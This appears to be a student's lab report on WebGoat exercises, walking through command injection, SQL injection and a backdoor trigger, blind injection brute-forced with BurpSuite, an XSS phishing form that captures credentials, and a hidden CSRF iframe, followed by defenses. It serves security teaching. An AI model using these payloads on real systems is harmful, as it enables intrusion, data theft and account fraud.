20155236范晨歌_Web安全基础实践

目录

实践目标

  • (1)理解常用网络攻击技术的基本原理。
  • (2)Webgoat实践下相关实验。

WebGoat

  • WebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序,这些漏洞并非程序中的bug,而是故意设计用来讲授Web应用程序安全课程的。这个应用程序提供了一个逼真的教学环境,为用户完成课程提供了有关的线索。
  • 因为WebGoat是基于java开发的软件,所以它具有平台无关性,在各种操作平台上都可以运行,所以本次实验所处的系统为kali机
  • 在命令行中输入以下指令即可运行相关jar
    • java -jar webgoat-container-7.0.1-war-exec.jar
  • WebGoat默认使用8080端口,所以在看到相关提示后即可开始:INFO: Starting ProtocolHandler ["http-bio-8080"]

BurpSuite

  • Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。
  • 配置本机BurpSuite
    • Proxy->Option中选择add添加项,设置代理IP及其端口(我设置的是8088和127.0.0.1),添加完毕后选择run启动
    • 在浏览器中(以火狐举例),在Preferences->Advanced中选择Settings,勾选Manual proxy configuration,输入刚刚设置的IP与端口即可
    • 然后在Proxy->intercept点击`“Intercept is off”,即可启用代理

Injection Flaws

Command Injection

  • 这个界面可以执行系统命令并返回给用户,所以应该在请求项里面添加shell命令,执行ifconfig
  • 具体来说,就是用前文提到的BurpSuite工具拦截请求,并将其中的参数改为(我的是这样):
    • AccessControlMatrix.help"& ifconfig"
    • 表示执行这2个指令,在网页的最后能看到ifconfig的结果,成功

Numeric SQL Injection

  • 要求:尝试用SQL注入,使得能查到所有的天气
  • 思路也很简单,直接构造永真式,即可查找到所有记录
  • 既可以按照上一题的思路用工具捕包修改,也可以直接按F12修改网页源文件,将需要查找的value改为:101 or 1=1
  • 点击go,看到所有城市的天气,成功

Log Spoofing

  • 题目的意思是要你写一个SQL字符串,因为网页会将你输入错误的用户名返回给你,所以我们的目标是使得网页返回给你的结果显示的你登录成功一样
  • 所以在用户名那构造语句:gq%0d%0aLogin Succeeded for username: admin

LAB:SQL Injection

Stage 1:String SQL Injection

  • 根据描述,是要求你在不知道密码的前提下,还能登录成功
  • 那也就只能用SQL注入了,利用SQL相关语法,利用'进行前后封闭,构成一个永真式,这一题较为基础,构造方法也很多,我用的是'or 1='1
  • 需要注意的是:如果直接写永真式,会超过字符长度限制,而一般永真式超过了限制的8字符,所以得F12查看源代码,对密码输入长度进行扩大,再进行注入;或者可以构造一个密码,使得尽量提前封闭,如我上述的密码,刚好8个字符。
  • 为了能取得权限,最好选择admin登录,最后左边栏会有提示成功

Stage 2:Parameterized Query #1

  • 这个没有测试成功,最后才发现题目中有这样一句话,可能只有开发版的才可以成功吧
  • THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

Stage 3:Numeric SQL Injection

  • 题目要求:登录Larry账户,但是能查看Boss的信息
  • 所以首先根据Stage 1中的万能密钥取得Larry权限,这样我们就可以点击ViewProfile来查看相关信息了,显然此时只能查到自己的信息
  • 但细究其原理不难发现与之前如出一辙,此时要查看老板信息,本质上还是查询数据库中字段为老板的那条记录并输出,所以仍然可以在请求时注入,不同的是此时没有输入框提供注入字符串,所以我们要借助前文所提到的BurpSuite工具,拦截此时的请求包,构造SQL请求参数,需要将employee_id的值改为101 or 1=1
  • 但测试后发现仍旧显示Larry的信息,猜想是不是因为界面太小只能显示一个?我这样的注入可以将所有的信息全查询到,那怎样让它输出的第一个就是我们想要的老板信息呢?
  • 仔细观察Larry的信息表可以发现有Salary这一字段,说明数据表中也存在,那么对于一个老板来说工资最高,我就可以以工资为条件,对查询结果进行个排序,构造SQL语句如下:
    • 101 or 1=1 order by salary desc
    • 成功,老板工资450k,毕竟老板!

Stage 4:Parameterized Query #2

  • Stage 2,只能在开发版上成功

String SQL Injection

  • 要求:要你输入正确的Last name登录进去
  • 显然我啥都不知道,只能用万能密钥试一试了,根据前文输入:
    • 'or 1='1
    • 成功,因为为永真,所以任何用户的信息都看见了

Database Backdoors

  • 根据题目要求是要你使用多条语句的SQL注入,更新数据表
  • 根据前一篇博客的多条语句注入练习,在此,设置如下SQL语句:
    • 101; update employee set salary=10000
    • 发现数据表所有人员工资都等于10000已经更新,成功
  • 以上是第一步要求,第二步要求:更加高级的是插入后门,下边这个后门好象是创建新用户的时候会自动修改邮箱为你的邮箱
    • 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid

Blind Numeric SQL Injection

  • 数字盲注,有些时候存在SQL注入,但是获取不到我们需要的信息,此时可以通过SQL语句的条件判断,进行盲注。
  • 比如这一关,我们知道一个cc_number=1111222233334444,但是想知道其pin在pins table里的值,可以使用盲注进行爆破,输入
    • 101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );
    • 打开BurpSuite工具监听,捕获到第一条请求报文,因为需要反复尝试我们可以通过该工具进行暴力破解
  • 右击报文选择send to intruder,然后在Intruder下选择相关设置:
    • Target中,设置本机IP地址HOST,和端口号,也就是WebGoat的地址和端口号
    • Positions中,选择Sniper模式,然后用光标选中需要暴力穷举的变量,在此处是account_number后的值,然后点击右侧的add添加(在此之前点击clear清空所有的)
    • Payloads中,选择type类型为number,然后设置变化范围,并设置步长为1,这样可以精确地找到数据包变化的number,从而便于我们确认位置
    • Options中,选择Start attack开始攻击
  • 找到数据包大小变化的位置2364,用2364登录,成功!

Cross-Site Scripting (XSS)

Phishing with XSS

  • 反射型XSS是最常用,也是使用得最广的一种攻击方式。它通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。
  • 将下边的代码输入到文本框,XSS会造成一个钓鱼的登录界面,用来骗取登录账户和密码
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br><br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

Stored XSS Attacks

  • 这是一种最典型的储存型XSS的例子,因为没有对用户的输入进行编码,所以用户A可以任意输入,然后用户B点击用户A的留言,触发了XSS,导致中招
  • 具体操作是这样的:
    • title可以任意输入,根据第一次尝试可以发现,输入的这个可以作为一个超链接更新保存在本界面,点击后即可查看输入内容
    • Message输入消息,可以嵌入一段js代码,用户点击后即可触发,例如输入:<script>alert("20145221 attack succeed!");</script>

Reflected XSS Attacks

  • 根据题目可以知道这是一个反射型的XSS攻击,类同于第一个,在交互输入的位置有XSS漏洞,直接构造一段脚本即可发起攻击,例如输入以下代码即可成功:

    • <script>alert("20145221 attack succeed!");</script>

Cross Site Request Forgery (CSRF)

  • 这里是一个储存型XSS和CSRF结合的示例,CSRF就是冒名登录,用代码伪造请求
  • 这里是把CSRF恶意代码利用储存型XSS放到了网页上,通过留言Message里输入,构造恶意代码如下
    • <iframe src="attack?Screen=504&amp;menu=900&amp;transferFunds=5000"></iframe>
    • 当用户点击这个留言,就会触发,显示已转走5000元
    • 注意:上述screen和menu参数的值和网站右边显示的要保持一致
    • 如果想让用户在不查觉的情况下,可以将<iframe>中的长和宽参数设为1像素,这样就看不见了

总结

SQL注入攻击原理,如何防御

原理

  • 就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
  • 具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

防御

  • 检查变量数据类型和格式

    • 如果你的SQL语句是类似where id={$id}这种形式,数据库里所有的id都是数字,那么就应该在SQL被执行前,检查确保变量id是int类型;如果是接受邮箱,那就应该检查并严格确保变量一定是邮箱的格式,其他的类型比如日期、时间等也是一个道理。总结起来:只要是有固定格式的变量,在SQL语句执行前,应该严格按照固定格式去检查,确保变量是我们预想的格式,这样很大程度上可以避免SQL注入攻击。
  • 过滤特殊符号
    • 对于无法确定固定格式的变量,一定要进行特殊符号过滤或转义处理。以PHP为例,通常是采用addslashes函数,它会在指定的预定义字符前添加反斜杠转义,这些预定义的字符是:单引号 (') 双引号 (") 反斜杠 () NULL。
  • 绑定变量,使用预编译语句
    • MySQL的mysqli驱动提供了预编译语句的支持,不同的程序语言,都分别有使用预编译语句的方法
    • 这样做的好处就是,如果我输入密码:'or 1='1,那他也只会被当作密码来处理,不会和sql语句其他结构关联

XSS攻击的原理,如何防御

原理

  • 恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。

防御

  • 一种方法是在表单提交或者url参数传递前,对需要的参数进行过滤
  • 在输入方面对所有用户提交内容进行可靠的输入验证,提交内容包括URL、查询关键字、http头、post数据等
  • 在输出方面,在用户输内容中使用<XMP>标签。标签内的内容不会解释,直接显示。
  • 严格执行字符输入字数控制,因为XSS代码往往很多,所以要对字符数进行控制

CSRF攻击原理,如何防御

原理

  • 跨站请求伪造,攻击者盗用了你的身份,以你的名义发送恶意请求。
  • CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账
  • 造成的问题包括:个人隐私泄露以及财产安全。

防御

  • 验证码

    • 可以在某些敏感操作过程中,加入验证码,以确认用户身份
  • Token
    • CSRF能攻击成功,根本原因是:操作所带的参数均被攻击者猜测到。既然知道根本原因,我们就对症下药,利用Token。当向服务器传参数时,带上Token。这个Token是一个随机值,并且由服务器和用户同时持有。当用户提交表单时带上Token值,服务器就能验证表单和session中的Token是否一致。

实验感想

  • 在安全领域,一般用帽子的颜色来比喻黑客的善与恶,“白帽子”和”黑帽子”是就是两个完全对立的群体。对于黑帽子而言,他们只要找到系统的一个切入点就可以达到入侵破坏的目的,而白帽子必须将自己系统所有可能被突破的地方都设防,以保证系统的安全运行。
  • 看起来好像是不公平的,但是安全世界里的规则就是这样,可能我们的网站99%都布防的很好,考虑的很周到,但是只要有1%的地方疏忽了,攻击者利用这个1%必然能进行突破,让我们另外的99%白费。

20155236范晨歌_Web安全基础实践的更多相关文章

  1. 20155236范晨歌_Web基础

    20155236范晨歌_Web基础 目录 实践目标 Apache 前端编程 后端编程 PHP MYSQL & 后端 简单SQL注入与XSS 发帖和会话管理 实践目标 (1)Web前端HTML ...

  2. 20155236范晨歌_MSF基础应用

    20155236范晨歌_MSF基础应用 20155236范晨歌_MSF基础应用 目录 概述 MS08-067漏洞攻击 MS11-050漏洞攻击 MS10-087漏洞攻击 辅助模块 概述 MSF的六种模 ...

  3. 20155236范晨歌_EXP3免杀原理与实践

    20155236范晨歌_免杀原理与实践 免杀 概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字 ...

  4. 20155236范晨歌 Exp7 网络欺诈技术防范

    20155236范晨歌 Exp7 网络欺诈技术防范 虚拟机经常崩= =,所以基本上做一个实验换一个... 遇到了一个简单的小问题老师帮忙解决了:虚拟机没联网... 一.基础问题回答 通常在什么场景下容 ...

  5. 20155236范晨歌_exp6信息搜集与漏洞扫描

    20155236范晨歌_exp6信息搜集与漏洞扫描 目录 实践目标 信息搜集 漏洞扫描 总结 实践目标 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现.端口 ...

  6. 20155236范晨歌 Exp1PC平台逆向破解及Bof基础实践

    出现的问题及解决: 在下载execstack时,出现了下列签名无效的错误! 解决方案:发现是密钥过期了,将新的密钥填入apt-keyring 输入命令:apt-key adv --keyserver ...

  7. 20155236范晨歌 Exp2后门原理与实践

    ## 实验二 后门原理与实践 1.Windows获得Linux Shell 在windows下,打开CMD,使用ipconfig指令查看本机IP ncat.exe -l -p 5236监听本机的523 ...

  8. 20145221高其_Web安全基础实践

    20145221高其_Web安全基础实践 目录 实践目标 WebGoat BurpSuite Injection Flaws Cross-Site Scripting (XSS) 总结 实践目标 (1 ...

  9. 20145212罗天晨 逆向及Bof基础实践

    20145212罗天晨<网络对抗>第1周学习总结--逆向及Bof基础实践 逆向及Bof基础实践 一.实践目标 1.运行原本不可访问的代码片段 2.强行修改程序执行流 3.以及注入运行任意代 ...

随机推荐

  1. Application_Start 多次启动问题

    最近在重构一个项目,在重构过程中出现了Application_Start 多次启动的问题,查询资料说是应用程序池内的修改会导致这个问题,后来发现确实如此 因为在重构过程中,我将数据库文件(sqlite ...

  2. Html5+离线打包创建本地消息

    自己离线打包Html5+ Runtime,通常是导入SDK的Hello实例,然后修改.在做消息通知功能时,使用push.createMessage不起作用. 首先参考Android平台离线打包推送插件 ...

  3. Django 自定义表

    1.Django自带的用户表 create table auth_user ( id int auto_increment primary key, password varchar(128) not ...

  4. SpringMVC在Controller层中注入request的坑

    记一次为了节省代码没有在方法体中声明HttpServletRequest,而用autowire直接注入所钻的坑 结论 给心急的人. 直接在Controller的成员变量上使用@Autowire声明Ht ...

  5. 负载均衡(Load Balancing)学习笔记(一)

    概述 在分布式系统中,负载均衡(Load Balancing)是一种将任务分派到多个服务端进程的方法.例如,将一个HTTP请求派发到实际的Web服务器中执行的过程就涉及负载均衡的实现.一个HTTP请求 ...

  6. Prometheus Node_exporter 之 FileSystem Detail

    FileSystem Detail /proc/filesystems 1. Filesystem space available type: GraphUnit: bytesLabel: Bytes ...

  7. C# 倒计时

    c#中有一个叫做timespan的数据类型,可以这样构造: TimeSpan ts = , , ); TimeSpan(hour,minute,second); 然后拖进去一个timer,叫timer ...

  8. Sql Server2008R2下载地址

    ed2k://%7Cfile%7Ccn_sql_server_2008_r2_enterprise_x86_x64_ia64_dvd_522233.iso%7C4662884352%7C1DB0252 ...

  9. Excel表设置加密

    如果你是从事会计或者人事等数据敏感岗位时,有时手上的电子表格不想被其他人浏览或者增删时,可以给表设置一个密码,这样就安全了. 具体操作如下:(以2007版本为例) 01.把需要加密的文件另存为 02. ...

  10. 新人如何进入IT行业

    你遇到了我刚毕业时遇到的问题. 现在需要知道你希望在那里就业,上海和北京就业的待遇差不多,北京能比上海稍微少点(我是指你这类刚毕业的) 说主题好了 应届毕业,找工作都很难的,因为现在很多企业是不愿意找 ...